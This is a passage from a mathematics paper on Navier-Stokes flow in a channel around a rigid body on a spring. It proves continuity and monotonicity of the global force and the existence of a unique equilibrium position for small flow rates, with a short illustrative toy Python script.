C(\varepsilon_{t}(h))^{-3/2}\lambda. \tag{4.12}\] Putting together (4.9)-(4.12), we deduce that there exists \(\eta_{t}>0\) sufficiently small such that, for \((\lambda,h)\in[0,\Lambda)\times(H-\delta_{t}-\eta_{t},H-\delta_{t})\), \[|L(\lambda,h)|\leq C\max\{(\varepsilon_{t}(h))^{-3/2},U(\varepsilon_{t}(h))^{-3}\}\lambda. \tag{4.13}\] For \(h\in[-H+\delta_{b}+\eta_{b},H-\delta_{t}-\eta_{t}]\), \(\varepsilon_{b}(h)\) and \(\varepsilon_{t}(h)\) are uniformly bounded from below with respect to \(h\). Therefore, by combining (4.8) and (4.13), there exists \(C>0\) independent of \(h\) such that, for any \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\), \[|L(\lambda,h)|\leq C((\varepsilon_{b}(h))^{-3/2}+\max\{(\varepsilon_{t}(h))^{-3/2},U(\varepsilon_{t}(h))^{-3}\})\lambda.\] ## 5. Proof of Theorem 3.1 ### Continuity and monotonicity of the global force In Section 3 we have already set the lift \(L(\lambda,h)\) as a function of \((\lambda,h)\in[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\). Let \(f\) be the restoring force satisfying (3.2)-(3.3). Then, the global force acting on \(B_{h}\) is the function \(\phi:[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\to\mathbb{R}\) defined by \[\phi(\lambda,h)=f(h)+L(\lambda,h).
\tag{5.1}\] We first focus on the \(\lambda\)-dependence by maintaining \(h\) fixed and we prove the Lipschitz-continuity of the map \(\lambda\mapsto\phi(\lambda,h)\). **Proposition 5.1**.: _Let \(\phi:[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\to\mathbb{R}\) be as in (5.1). There exists \(\overline{\lambda}\in(0,\Lambda]\) such that \(\lambda\mapsto\phi(\lambda,h)\) is Lipschitz continuous in \([0,\overline{\lambda})\) for all \(h\in(-H+\delta_{b},H-\delta_{t})\)._ Proof.: Since \(f\) does not depend on \(\lambda\) we only need to show that \(\lambda\mapsto L(\lambda,h)\) is Lipschitz continuous in a neighborhood of \(\lambda=0\). For \(\lambda_{1},\lambda_{2}\in[0,\Lambda)\) consider, respectively, the solutions \((u(\lambda_{1}),p(\lambda_{1}))\) and \((u(\lambda_{2}),p(\lambda_{2}))\) to (2.4). Let \[v:=u(\lambda_{1})-u(\lambda_{2}),\qquad q:=p(\lambda_{1})-p(\lambda_{2}), \tag{5.2}\] so that \((v,q)\) satisfies \[-\mu\Delta v+v\cdot\nabla v+\nabla q=-v\cdot\nabla u(\lambda_{2})-u(\lambda_{2})\cdot\nabla v,\qquad\nabla\cdot v=0\quad\text{in}\quad\Omega_{h},\] \[v_{|_{\Gamma_{t}}}=(\lambda_{1}-\lambda_{2})Ue_{1},\ v_{|_{\Gamma_{l}}}=(\lambda_{1}-\lambda_{2})V_{\text{in}}(x_{2})e_{1},\ v_{|_{\Gamma_{r}}}=(\lambda_{1}-\lambda_{2})V_{\text{out}}(x_{2})e_{1},\] \[v_{|_{\partial B_{h}}}=v_{|_{\Gamma_{b}}}=0. \tag{5.3}\] Let \(v_{\lambda}:=v-s_{\lambda}\), where \(s_{\lambda}\in W^{1,\infty}(\Omega_{h})\cap H^{2}(\Omega_{h})\) is a solenoidal extension of \(v\) that can be constructed as \(s\) in (2.24) and, hence, it satisfies the estimates (2.25), namely \[\begin{split}\|\nabla s_{\lambda}\|_{L^{2}(\Omega_{h})}&\leq C_{h}|\lambda_{1}-\lambda_{2}|,&\|\Delta s_{\lambda}\|_{L^{2}(\Omega_{h})}\leq C_{h}|\lambda_{1}-\lambda_{2}|,\\ \|s_{\lambda}\|_{L^{\infty}(\Omega_{h})}&\leq C_{h}|\lambda_{1}-\lambda_{2}|,&\|s_{\lambda}\cdot\nabla s_{\lambda}\|_{L^{2}(\Omega_{h})}\leq C_{h}|\lambda_{1}-\lambda_{2}|^{2}.\end{split} \tag{5.4}\] We then rewrite (5.3) as \[-\mu\Delta v_{\lambda}+v_{\lambda}\cdot\nabla v_{\lambda}+\nabla q=g,\quad\nabla\cdot v_{\lambda}=0\quad\text{in}\quad\Omega_{h},\qquad v_{\lambda|_{\partial\Omega_{h}}}=0, \tag{5.5}\] where \[g:=\mu\Delta s_{\lambda}-v\cdot\nabla(u(\lambda_{2})+s_{\lambda})-u(\lambda_{2})\cdot\nabla v+s_{\lambda}\cdot\nabla s_{\lambda}-s_{\lambda}\cdot\nabla v.\] From Theorem 2.2 we know that \(v,u(\lambda_{2})\in H^{2}(\Omega_{h})\hookrightarrow L^{\infty}(\Omega_{h})\), so that \(g\in L^{2}(\Omega_{h})\). Moreover, \[\|g\|_{L^{2}(\Omega_{h})} \leq\mu\|\Delta s_{\lambda}\|_{L^{2}(\Omega_{h})}+\big{(}\|\nabla u(\lambda_{2})\|_{L^{2}(\Omega_{h})}+\|\nabla s_{\lambda}\|_{L^{2}(\Omega_{h})}\big{)}\|v\|_{L^{\infty}(\Omega_{h})}\] \[\quad+\|u(\lambda_{2})\|_{L^{\infty}(\Omega_{h})}\|\nabla v\|_{L^{2}(\Omega_{h})}+\|s_{\lambda}\cdot\nabla s_{\lambda}\|_{L^{2}(\Omega_{h})}+\|s_{\lambda}\|_{L^{\infty}(\Omega_{h})}\|\nabla v\|_{L^{2}(\Omega_{h})}\] \[\leq C_{h}|\lambda_{1}-\lambda_{2}|+C_{h}\big{(}\lambda_{2}+|\lambda_{1}-\lambda_{2}|\big{)}\|v\|_{H^{2}(\Omega_{h})}\] \[\quad+C_{h}\lambda_{2}\|v\|_{H^{2}(\Omega_{h})}+C_{h}|\lambda_{1}-\lambda_{2}|^{2}+C_{h}|\lambda_{1}-\lambda_{2}|\cdot\|v\|_{H^{2}(\Omega_{h})},\] where we used Holder inequality (first step), the estimates (2.7)-(2.8)-(5.4) and the embeddings \(H^{2}\hookrightarrow H^{1},L^{\infty}\) (second step).
Thus, by applying Lemma IX.5.1 in [4] to (5.5), we obtain \[\|v_{\lambda}\|_{H^{2}(\Omega_{h})}+\|q\|_{H^{1}(\Omega_{h})}\leq C_{h}| \lambda_{1}-\lambda_{2}|+C_{h}\big{(}\lambda_{2}+|\lambda_{1}-\lambda_{2}| \big{)}\|v\|_{H^{2}(\Omega_{h})}. \tag{5.6}\] Hence, there exists \(\overline{\lambda}\in(0,\Lambda]\) such that, if \(\lambda_{1},\lambda_{2}\in[0,\overline{\lambda})\), the second term in the right-hand side of (5.6) can be absorbed in the left-hand side and \[\|v_{\lambda}\|_{H^{2}(\Omega_{h})}+\|q\|_{H^{1}(\Omega_{h})}\leq C_{h}| \lambda_{1}-\lambda_{2}|, \tag{5.7}\] for some \(C_{h}>0\) also depending on \(\overline{\lambda}\). Since the lift (3.1) is linear with respect to \(u\) and \(p\), we have \[L(\lambda_{1},h)-L(\lambda_{2},h)=-e_{2}\cdot\int_{\partial B_{h}}\mathbb{T}(v, q)n\] with \(v\) and \(q\) defined in (5.2). Therefore, using the Trace Theorem and (5.7), we infer that, for any \(\lambda_{1},\lambda_{2}\in[0,\overline{\lambda})\) and a fixed \(h\in(-H+\delta_{b},H-\delta_{t})\), we have \[|L(\lambda_{1},h)-L(\lambda_{2},h)| \leq C_{h}\left(\|\nabla v\|_{L^{1}(\partial B_{h})}+\|q\|_{L^{1} (\partial B_{h})}\right)\] \[\leq C_{h}\left(\|v\|_{H^{2}(\Omega_{h})}+\|q\|_{H^{1}(\Omega_{h} )}\right)\leq C_{h}|\lambda_{1}-\lambda_{2}|.\] This shows that \(\lambda\mapsto L(\lambda,h)\) is Lipschitzian in \([0,\overline{\lambda})\) for all \(h\in(-H+\delta_{b},H-\delta_{t})\). We now focus on the \(h\)-dependence of \(\phi\) by maintaining \(\lambda\) fixed. Although we prove a slightly stronger result, we state: **Proposition 5.2**.: _Let \(\phi:[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\to\mathbb{R}\) be as in (5.1) and let \(\overline{h}=H-\max\{\delta_{b},\delta_{t}\}\). There exist \(h_{0}\in(0,\overline{h})\) and \(\lambda_{0}\in(0,\Lambda]\) such that \(h\mapsto\phi(\lambda,h)\) is continuous and strictly increasing in \([-h_{0},h_{0}]\) for all \(\lambda\in[0,\lambda_{0})\)._ Proof.: Let \(0<r_{1}<r_{2}\) and \(D_{r_{i}}(0)\) be the open disk centered at \((0,0)\) with radius \(r_{i}\). Choose \(h_{0}\in(0,\overline{h})\) in such a way that \(B_{h}\subset D_{r_{1}}(0)\subset D_{r_{2}}(0)\subset R\) whenever \(|h|\leq h_{0}\); in later steps we may need to choose a possibly smaller \(h_{0}\) that, however, we continue calling \(h_{0}\). Let \(\sigma\in W^{2,\infty}(R,\mathbb{R}^{2})\) be defined by \[\sigma(x_{1},x_{2})=F(|x|)e_{2}, \tag{5.8}\] with \(F\equiv 1\) in \([0,r_{1}]\), \(F\equiv 0\) in \([r_{2},+\infty)\) and \(F\in W^{2,\infty}(r_{1},r_{2})\) is the polynomial of third degree such that \(F(r_{1})=1\) and \(F(r_{2})=F^{\prime}(r_{1})=F^{\prime}(r_{2})=0\). For \(h\in[-h_{0},h_{0}]\), with \(h_{0}\) small, we view the fluid domain \(\Omega_{h}\) as a variation of \(\Omega_{0}\) via the diffeomorphism \(\mathrm{Id}+h\sigma\), that is, \[\Omega_{h}=(\mathrm{Id}+h\sigma)(\Omega_{0}).\] In particular, \(\partial B_{h}=\partial B_{0}+he_{2}\) with unit outer normal vector \(n(h)=n(0)\circ(\mathrm{Id}+he_{2})\). Let \(J(h)\) denote the Jacobian matrix of the diffeomorphism \(\mathrm{Id}+h\sigma\), that is, \[J(h)=I+h\frac{F^{\prime}(|x|)}{|x|}\begin{pmatrix}0&0\\ x_{1}&x_{2}\end{pmatrix}\] with \(I\) the \(2\times 2\) identity matrix. Fixing \(\lambda\in[0,\Lambda)\), the lift in (3.1) can be written as \[L(\lambda,h)=-e_{2}\cdot\int_{\partial B_{0}+he_{2}}\mathbb{T}(u(h),p(h))n(h)\] with \(\mathbb{T}(u(h),p(h))=\mathbb{T}(u(\lambda,h),p(\lambda,h))\). 
Letting \[U(h)=u(h)\circ(\mathrm{Id}+h\sigma),\quad P(h)=p(h)\circ(\mathrm{Id}+h\sigma)\] with \(\sigma\) as in (5.8), we transform the moving boundary integral into a fixed boundary integral, namely \[L(\lambda,h)=-e_{2}\cdot\int_{\partial B_{0}}\mathbb{T}(U(h),P(h))(n(0)\circ( \mathrm{Id}+he_{2})).\] Note that \((U(0),P(0))=(u(0),p(0))\). We now claim that \[h\mapsto(U(h),P(h))\in H^{2}(\Omega_{0})\times H^{1}(\Omega_{0})\text{ belongs to }C^{1}(-h_{0},h_{0}). \tag{5.9}\] To this end, let \(M(h)=(J^{-1}(h))^{T}\) and we rewrite (2.4) as \[-\mu\nabla\cdot(|\det J(h)|M^{T}(h)M(h)\nabla U(h))\] \[+U(h)\cdot|\det J(h)|M(h)\nabla U(h)+\nabla\cdot(|\det J(h)|M(h)P (h))=0\quad\text{in}\quad\Omega_{0},\] \[|\det J(h)|M(h)\nabla\cdot U(h)=0\quad\text{in}\quad\Omega_{0},\] complemented with the same boundary conditions. This can also be expressed as \[\mathcal{H}(h,U(h),P(h))=0 \tag{5.10}\] where \(\mathcal{H}:(-h_{0},h_{0})\times H^{2}(\Omega_{0})\times H^{1}(\Omega_{0}) \to L^{2}(\Omega_{0})\times H^{1}(\Omega_{0})\) is defined by \(\mathcal{H}(h,\xi,\varpi)=(\mathcal{H}_{1}(h,\xi,\varpi),\mathcal{H}_{2}(h, \xi,\varpi))\) with \[\mathcal{H}_{1}(h,\xi,\varpi)= -\mu\nabla\cdot(|\det J(h)|M^{T}(h)M(h)\nabla\xi)\] \[+\xi\cdot|\det J(h)|M(h)\nabla\xi+\nabla\cdot(|\det J(h)|M(h) \varpi),\] \[\mathcal{H}_{2}(h,\xi,\varpi)= |\det J(h)|M(h)\nabla\cdot\xi. \tag{5.11}\] Due to the expression (5.8), we are able to compute \(|\det J(h)|M(h)\) and \(|\det J(h)|M^{T}(h)M(h)\) explicitly at second order for \(h\to 0\). In fact, \[|\det J(h)|=1+h\frac{F^{\prime}(|x|)}{|x|}x_{2},\] \[M(h)=I+\frac{h}{|\det J(h)|}\frac{F^{\prime}(|x|)}{|x|}\begin{pmatrix}0&-x_{1} \\ 0&-x_{2}\end{pmatrix}=I+h\frac{F^{\prime}(|x|)}{|x|}\begin{pmatrix}0&-x_{1}\\ 0&-x_{2}\end{pmatrix}+O(h^{2})\] yield \[\begin{split}&|\det J(h)|M(h)=I+h\frac{F^{\prime}(|x|)}{|x|} \begin{pmatrix}x_{2}&-x_{1}\\ 0&0\end{pmatrix}=:I+hR_{0},\\ &|\det J(h)|M^{T}(h)M(h)\\ &=I+h\frac{F^{\prime}(|x|)}{|x|}\begin{pmatrix}x_{2}&-x_{1}\\ -x_{1}&-x_{2}\end{pmatrix}+h^{2}(F^{\prime}(|x|))^{2}\begin{pmatrix}0&0\\ 0&1\end{pmatrix}+O(h^{3})\\ &=:I+hR_{1}+h^{2}R_{2}+O(h^{3}).\end{split} \tag{5.12}\] Note that the expression of \(|\det J(h)|M(h)\) in (5.12) is exact and obtained without any Taylor expansion for \(h\to 0\). We have that \(\mathcal{H}\) is \(C^{1}\) in a neighborhood of \((0,U(0),P(0))\) since the mappings \(h\mapsto\det J(h)\) and \(h\mapsto M(h)\) are \(C^{1}(-h_{0},h_{0})\) with values in \(C^{1}(R,\mathbb{R}^{4})\). For \(h\in(-h_{0},h_{0})\), we consider the linearized operator \(L=D_{(\xi,\varpi)}\mathcal{H}(h,U(h),P(h))\) defined through the Jacobian matrix of \(\mathcal{H}\). For any \[(\chi,\Pi)\in\mathcal{X}\times\mathcal{Y}:=(H^{2}(\Omega_{0})\cap H_{0}^{1}( \Omega_{0}))\times(H^{1}(\Omega_{0})\cap L_{0}^{2}(\Omega_{0})),\] we have \(L(\chi,\Pi)=(L_{1}(\chi,\Pi),L_{2}(\chi,\Pi))\) with \[L_{1}(\chi,\Pi)= -\mu\nabla\cdot(|\det J(h)|M^{T}(h)M(h)\nabla\chi)+\chi\cdot| \det J(h)|M(h)\nabla U(h)\] \[+U(h)\cdot|\det J(h)|M(h)\nabla\chi+\nabla\cdot(|\det J(h)|M(h) \Pi),\] \[L_{2}(\chi,\Pi)= |\det J(h)|M(h)\nabla\cdot\chi.\] The linear operator \(L\) is bounded from \(\mathcal{X}\times\mathcal{Y}\) into \(L^{2}(\Omega_{0})\times\mathcal{Y}\). 
To show that \(L\) is an isomorphism, given \((\varphi,\phi)\in L^{2}(\Omega_{0})\times\mathcal{Y}\), we have to prove that there exists a unique solution \((\chi,\Pi)\in\mathcal{X}\times\mathcal{Y}\) to \[-\mu\Delta\chi+\chi\cdot\nabla U(h)+U(h)\cdot\nabla\chi+\nabla\Pi\] \[+h\left(-\mu\nabla\cdot R_{1}\nabla\chi+\chi\cdot R_{0}\nabla U(h )+U(h)\cdot R_{0}\nabla\chi+\nabla\cdot(R_{0}\Pi)\right)\] \[-h^{2}\mu\nabla\cdot R_{2}\nabla\chi+O(h^{3})=\varphi\] in \[\Omega_{0},\] \[\nabla\cdot\chi+hR_{0}\nabla\cdot\chi=\phi\] in \[\Omega_{0}.\] This linear elliptic problem admits a unique solution provided that \[|h|<h_{0}\qquad\text{and}\quad\|U(h)\|_{H^{2}(\Omega_{0})}<r\] for \(h_{0},r>0\) small enough. For \(|h|<h_{0}\) and \(\sigma\) as in (5.8), we have \[c\|u(h)\|_{H^{2}(\Omega_{h})}\leq \|U(h)\|_{H^{2}(\Omega_{0})}\leq C\|u(h)\|_{H^{2}(\Omega_{h})},\] \[c\|p(h)\|_{H^{1}(\Omega_{h})}\leq \|P(h)\|_{H^{1}(\Omega_{0})}\leq C\|p(h)\|_{H^{1}(\Omega_{h})}, \tag{5.13}\] with constants \(0<c\leq C\) independent of \(h\). Then, by taking \(\lambda\in[0,\Lambda)\), the bound (2.8), where the constant \(C_{h}\) is uniformly bounded for \(|h|<h_{0}\), yields the needed smallness condition for \(U(h)\), so that \(L\) is an isomorphism. Therefore, by applying the Implicit Function Theorem to (5.10), we conclude (5.9). Moreover, the derivatives \(U^{\prime}(h)\) and \(P^{\prime}(h)\), whose existence follows from (5.9), satisfy \[L(U^{\prime}(h),P^{\prime}(h))=-\partial_{h}\mathcal{H}(h,U(h),P(h)).\] From (5.12), we know that for any \(h\) (resp. \(h\to 0\)) \[\frac{d}{dh}(|\det J(h)|M(h))=R_{0},\quad\frac{d}{dh}(|\det J(h)|M^{T}(h)M(h)) =R_{1}+2hR_{2}+O(h^{2}).\] Then, (5.11) and the fact that \(L\) is an isomorphism imply that \((U^{\prime}(h),P^{\prime}(h))\) is uniquely determined by the linear elliptic problem \[-\mu\Delta U^{\prime}(h)+U^{\prime}(h)\cdot\nabla U(h)+U(h)\cdot \nabla U^{\prime}(h)+\nabla P^{\prime}(h)\] \[=S_{0}(U(h),P(h))+hS_{1}(U^{\prime}(h),P^{\prime}(h),U(h))+O(h^ {2})\qquad\text{in }\Omega_{0},\] \[\nabla\cdot U^{\prime}(h)=-R_{0}\nabla\cdot U(h)-hR_{0}\nabla \cdot U^{\prime}(h)\qquad\qquad\qquad\qquad\qquad\text{in }\Omega_{0},\] \[(U^{\prime}(h),P^{\prime}(h))\in\mathcal{X}\times\mathcal{Y}, \tag{5.14}\] with \[S_{0}(U(h),P(h)) =\mu\nabla\cdot R_{1}\nabla U(h)-U(h)\cdot R_{0}U(h)-\nabla\cdot (R_{0}P(h)),\] \[S_{1}(U^{\prime}(h),P^{\prime}(h),U(h)) =\mu\nabla\cdot(R_{1}\nabla U^{\prime}(h)+2R_{2}\nabla U(h))-U^{ \prime}(h)\cdot R_{0}\nabla U(h)\] \[\quad-U(h)\cdot R_{0}\nabla U^{\prime}(h)-\nabla\cdot(R_{0}P^{ \prime}(h)).\] For \(h\in(-h_{0},h_{0})\), with \(h_{0}\) small, we have \[\|U^{\prime}(h)\|_{H^{2}(\Omega_{0})}+\|P^{\prime}(h)\|_{H^{1}( \Omega_{0})}\] \[\leq C(\|U^{\prime}(h)\!\cdot\!\nabla U(h)+U(h)\!\cdot\!\nabla U^ {\prime}(h)\!+\!S_{0}(U(h),P(h))\|_{L^{2}(\Omega_{0})}+\|R_{0}\nabla\!\cdot\! U(h)\|_{H^{1}(\Omega_{0})}).\] Since \((U(h),P(h))\in H^{2}(\Omega_{0})\times H^{1}(\Omega_{0})\) due to (5.13) and Theorem 2.2, we bound the right-hand side of the above expression as \[\|U^{\prime}(h)\cdot\nabla U(h)+U(h)\cdot\nabla U^{\prime}(h)\|_{ L^{2}(\Omega_{0})}\leq C\|\nabla U^{\prime}(h)\|_{L^{2}(\Omega_{0})}\|U(h)\|_{H^{2}( \Omega_{0})},\] \[\|S_{0}(U(h),P(h))\|_{L^{2}(\Omega_{0})}+\|R_{0}\nabla\cdot U(h) \|_{H^{1}(\Omega_{0})}\leq C(\|U(h)\|_{H^{2}(\Omega_{0})}+\|P(h)\|_{H^{1}( \Omega_{0})}),\] where in the second inequality we used that \(\sigma\in W^{2,\infty}(R,\mathbb{R}^{2})\), see (5.8). 
Testing the first equation in (5.14) with \(U^{\prime}(h)\), using (5.13) and (2.13)-(2.14) yields \[\|\nabla U^{\prime}(h)\|_{L^{2}(\Omega_{0})} \leq C(\|U(h)\|_{H^{1}(\Omega_{0})}+\|U(h)\|_{H^{1}(\Omega_{0})}^{2}+\|P(h)\|_{L^{2}(\Omega_{0})})\] \[\leq C(\|U(h)\|_{H^{1}(\Omega_{0})}+\|U(h)\|_{H^{1}(\Omega_{0})}^{2}).\] Summarizing, we obtain \[\begin{split}&\|U^{\prime}(h)\|_{H^{2}(\Omega_{0})}+\|P^{\prime}(h)\|_{H^{1}(\Omega_{0})}\\ &\leq C\left(\|U(h)\|_{H^{2}(\Omega_{0})}(1+\|U(h)\|_{H^{1}(\Omega_{0})}+\|U(h)\|_{H^{1}(\Omega_{0})}^{2})+\|P(h)\|_{H^{1}(\Omega_{0})}\right)\\ &\leq C(\lambda+\lambda^{3})\leq C\lambda\end{split} \tag{5.15}\] for any \(\lambda\in[0,\Lambda)\), where in the second inequality we used (5.13) and (2.7)-(2.8). Finally, we estimate the variation of the lift for small values of \(h\), say \(|h|<h_{0}\). By taking \(h_{1},h_{2}\in(-h_{0},h_{0})\), from the Trace Theorem we have \[\begin{split}&|L(\lambda,h_{1})-L(\lambda,h_{2})|\\ &=\left|\int_{\partial B_{0}}\mathbb{T}(U(h_{1}),P(h_{1}))(n(0)\circ(\mathrm{Id}+h_{1}e_{2}))-\mathbb{T}(U(h_{2}),P(h_{2}))(n(0)\circ(\mathrm{Id}+h_{2}e_{2}))\right|\\ &\leq\int_{\partial B_{0}}|\mathbb{T}(U(h_{1}),P(h_{1}))-\mathbb{T}(U(h_{2}),P(h_{2}))|\\ &\quad+\int_{\partial B_{0}}|\mathbb{T}(U(h_{2}),P(h_{2}))|\cdot|n(0)\circ(\mathrm{Id}+h_{1}e_{2})-n(0)\circ(\mathrm{Id}+h_{2}e_{2})|\\ &\leq C(\|U(h_{1})-U(h_{2})\|_{H^{2}(\Omega_{0})}+\|P(h_{1})-P(h_{2})\|_{H^{1}(\Omega_{0})})\\ &\quad+C(\|U(h_{2})\|_{H^{2}(\Omega_{0})}+\|P(h_{2})\|_{H^{1}(\Omega_{0})})|h_{1}-h_{2}|.\end{split}\] Then, (5.15) and the Mean Value Theorem yield \[\begin{split}&|L(\lambda,h_{1})-L(\lambda,h_{2})|\\ &\leq C\lambda|h_{1}-h_{2}|+C(\|u(h_{2})\|_{H^{2}(\Omega_{h_{2}})}+\|p(h_{2})\|_{H^{1}(\Omega_{h_{2}})})|h_{1}-h_{2}|\leq C\lambda|h_{1}-h_{2}|\end{split}\] using (5.13) and (2.8) in \(\Omega_{h_{2}}\). Then, the monotonicity property (3.2) ensures that, if \(-h_{0}<h_{2}<h_{1}<h_{0}\), \[\phi(\lambda,h_{1})-\phi(\lambda,h_{2})=f(h_{1})-f(h_{2})+L(\lambda,h_{1})-L(\lambda,h_{2})\geq(\gamma-C\lambda)(h_{1}-h_{2}).\] There exists \(\lambda_{0}\in(0,\Lambda]\) such that \(\gamma-C\lambda_{0}\geq\gamma/2\). Therefore, \(h\mapsto\phi(\lambda,h)\) is continuous and strictly increasing in \([-h_{0},h_{0}]\) (with a possibly smaller \(h_{0}\)) for all \(\lambda\in[0,\lambda_{0})\). ### Conclusion of the proof Let \((u(\lambda,h),p(\lambda,h))\) be a solution to (2.4) and let \(\phi(\lambda,h)\) be the corresponding global force in (5.1). Then the triple \((u,p,h)\) is a solution to (3.4) if and only if \[(u(\lambda,h),p(\lambda,h))\text{ solves (2.4) and }\phi(\lambda,h)=0.\] Therefore, Theorem 3.1 follows once we prove: **Proposition 5.3**.: _Let \(\phi:[0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\to\mathbb{R}\) be as in (5.1). Then, there exist \(\Lambda_{1}\in(0,\Lambda]\) and a unique \(\mathfrak{h}\in C^{0}[0,\Lambda_{1})\) such that, for all \(\lambda\in[0,\Lambda_{1})\), \(\phi(\lambda,h)=0\) if and only if \(h=\mathfrak{h}(\lambda).\) Moreover, \(\|\mathfrak{h}\|_{L^{\infty}(0,\Lambda_{1})}\leq h_{0}\) with \(h_{0}\) as in Proposition 5.2._ Proof.: We prove the result in two steps, namely by analyzing the behavior of \(\phi\) in two different subregions of \([0,\Lambda)\times(-H+\delta_{b},H-\delta_{t})\). We start by considering the case when \(|h|\) is close to \(0\). Let \(\overline{h}=H-\max\{\delta_{b},\delta_{t}\}\).
We claim that there exist \(h_{0}\in(0,\overline{h})\), \(\widetilde{\lambda}\in(0,\Lambda]\) and a unique \(\mathfrak{h}\in C^{0}[0,\widetilde{\lambda})\) such that \[\forall(\lambda,h)\in[0,\widetilde{\lambda})\times[-h_{0},h_{0}]\qquad\phi(\lambda,h)=0\iff h=\mathfrak{h}(\lambda). \tag{5.16}\] To this end, we notice that Theorem 2.2 implies that, when \(\lambda=0\), the unique solution to (2.4) is \((u,p)=(0,0)\), regardless of the value of \(h\in(-H+\delta_{b},H-\delta_{t})\). Hence, \(\phi(0,0)=0\). Moreover, by Proposition 5.2 we know that \(h\mapsto\phi(0,h)\) is continuous and strictly increasing in \([-h_{0},h_{0}]\). These two facts imply that \[\phi(0,-h_{0})<0<\phi(0,h_{0}). \tag{5.17}\] In turn, by Proposition 5.1 we know that \(\lambda\mapsto\phi(\lambda,h)\) is continuous in \([0,\overline{\lambda})\) (with \(\overline{\lambda}\in(0,\Lambda]\)) for all \(h\in[-h_{0},h_{0}]\). By (5.17) and by compactness, we then infer that there exists \(\widetilde{\lambda}\in(0,\min\{\lambda_{0},\overline{\lambda}\}]\) such that \[\phi(\lambda,-h_{0})<0<\phi(\lambda,h_{0})\qquad\forall\lambda\in[0,\widetilde{\lambda}) \tag{5.18}\] and, by invoking again Proposition 5.2, that \(h\mapsto\phi(\lambda,h)\) is continuous and strictly increasing in \([-h_{0},h_{0}]\) for all \(\lambda\in[0,\widetilde{\lambda})\). Together with (5.18), this implies that for all \(\lambda\in[0,\widetilde{\lambda})\) there exists a unique \(\mathfrak{h}(\lambda)\in[-h_{0},h_{0}]\) such that \(\phi(\lambda,\mathfrak{h}(\lambda))=0\). This defines the function \(\lambda\mapsto\mathfrak{h}(\lambda)\) in the interval \([0,\widetilde{\lambda})\). Its continuity follows from the (separate) continuity properties proved in Propositions 5.1 and 5.2. The proof of (5.16) is thus complete. For \(h_{0}\) as in (5.16), we now claim that there exists \(\widehat{\lambda}\in(0,\Lambda]\) such that \[\phi(\lambda,h)\neq 0\qquad\forall(\lambda,h)\in[0,\widehat{\lambda})\times\Big{[}(-H+\delta_{b},H-\delta_{t})\setminus[-h_{0},h_{0}]\Big{]}. \tag{5.19}\] Indeed, from (3.2)-(3.3) we know that there exists \(K_{0}\in(0,K]\) such that \[\begin{split} f(h)\leq-K_{0}(\varepsilon_{b}(h))^{-3/2}\qquad\text{for}\quad h\in(-H+\delta_{b},-h_{0}),\\ f(h)\geq K_{0}\max\{(\varepsilon_{t}(h))^{-3/2},U(\varepsilon_{t}(h))^{-3}\}\qquad\text{for}\quad h\in(h_{0},H-\delta_{t}),\end{split} \tag{5.20}\] while from Theorem 3.2 there exists (a different) \(C>0\) such that \[\begin{split} L(\lambda,h)\leq C(\varepsilon_{b}(h))^{-3/2}\ \lambda\qquad\text{for}\quad h\in(-H+\delta_{b},-h_{0}),\\ L(\lambda,h)\geq-C\max\{(\varepsilon_{t}(h))^{-3/2},U(\varepsilon_{t}(h))^{-3}\}\ \lambda\qquad\text{for}\quad h\in(h_{0},H-\delta_{t}).\end{split} \tag{5.21}\] Gathering (5.20)-(5.21) together yields \[\begin{split}\phi(\lambda,h)\leq(-K_{0}+C\lambda)(\varepsilon_{b}(h))^{-3/2}\qquad\text{for}\quad h\in(-H+\delta_{b},-h_{0}),\\ \phi(\lambda,h)\geq(K_{0}-C\lambda)\max\{(\varepsilon_{t}(h))^{-3/2},U(\varepsilon_{t}(h))^{-3}\}\qquad\text{for}\quad h\in(h_{0},H-\delta_{t}).\end{split}\] Then, there exists \(\widehat{\lambda}\in(0,\Lambda]\) such that (5.19) holds. Finally, the statement of the proposition follows from (5.16) and (5.19) by taking \(\Lambda_{1}=\min\{\widetilde{\lambda},\widehat{\lambda}\}\).
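The structure of the above proof can be visualized on a purely illustrative toy model: a strictly increasing global force with the blow-up signs of (5.20)-(5.21) has exactly one zero, which can be captured by bisection. In the sketch below the restoring force and the "lift" are made up for illustration only (they are not obtained from (2.4)), and all numerical values are arbitrary.

```python
# Toy illustration of Proposition 5.3 (not the actual lift of Theorem 3.2):
# phi(lam, .) = f + lam*ell is strictly increasing near h = 0 and has the
# blow-up signs (5.20)-(5.21), so its unique zero h(lam) exists and h(0) = 0.
H, delta = 1.0, 0.1                     # toy channel half-height and body half-height
eb = lambda h: h + (H - delta)          # toy gap below the body
et = lambda h: (H - delta) - h          # toy gap above the body
f   = lambda h: 5.0 * h - eb(h)**-1.5 + et(h)**-1.5   # toy restoring force, f(0) = 0
ell = lambda h: eb(h)**-1.5 - 0.5 * et(h)**-1.5       # toy "lift" obeying a bound like (3.5)
phi = lambda lam, h: f(h) + lam * ell(h)

def equilibrium(lam, a=-0.9 + 1e-9, b=0.9 - 1e-9, iters=80):
    # Bisection: phi(lam, a) < 0 < phi(lam, b) for small lam, and phi increases in h.
    for _ in range(iters):
        m = 0.5 * (a + b)
        a, b = (m, b) if phi(lam, m) < 0 else (a, m)
    return 0.5 * (a + b)

for lam in [0.0, 0.05, 0.1, 0.2]:
    print(lam, equilibrium(lam))        # h(0) = 0; h(lam) varies continuously with lam
```

For \(\lambda=0\) the computed equilibrium is \(h=0\), and it moves continuously as \(\lambda\) increases, in accordance with Theorem 3.1.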
_Remark 5.4_.: In fact, the proof of (5.19) shows that if \(\lambda>0\) is small, then \[h_{0}<h<H-\delta_{t}\implies\phi(\lambda,h)>0\quad\text{and}\quad-H+\delta_{b }<h<-h_{0}\implies\phi(\lambda,h)<0.\] From a physical point of view, this means that, for small Reynolds numbers, the global force \(\phi=\phi(\lambda,h)\) in (5.1) pushes downwards the body if \(B_{h}\) is close to the upper boundary \(\Gamma_{t}\), whereas it pushes the body upwards if \(B_{h}\) is close to the lower boundary \(\Gamma_{b}\). ## 6. Symmetric configuration We consider here a symmetric framework for (3.4), that is, when \[(x_{1},x_{2})\in\partial B\iff(x_{1},-x_{2})\in\partial B\] and the boundary data are symmetric with respect to the line \(x_{2}=0\). Therefore, the FSI problem (3.4) is modified on \(\Gamma_{b}\) and reads \[\begin{array}{c}-\mu\Delta 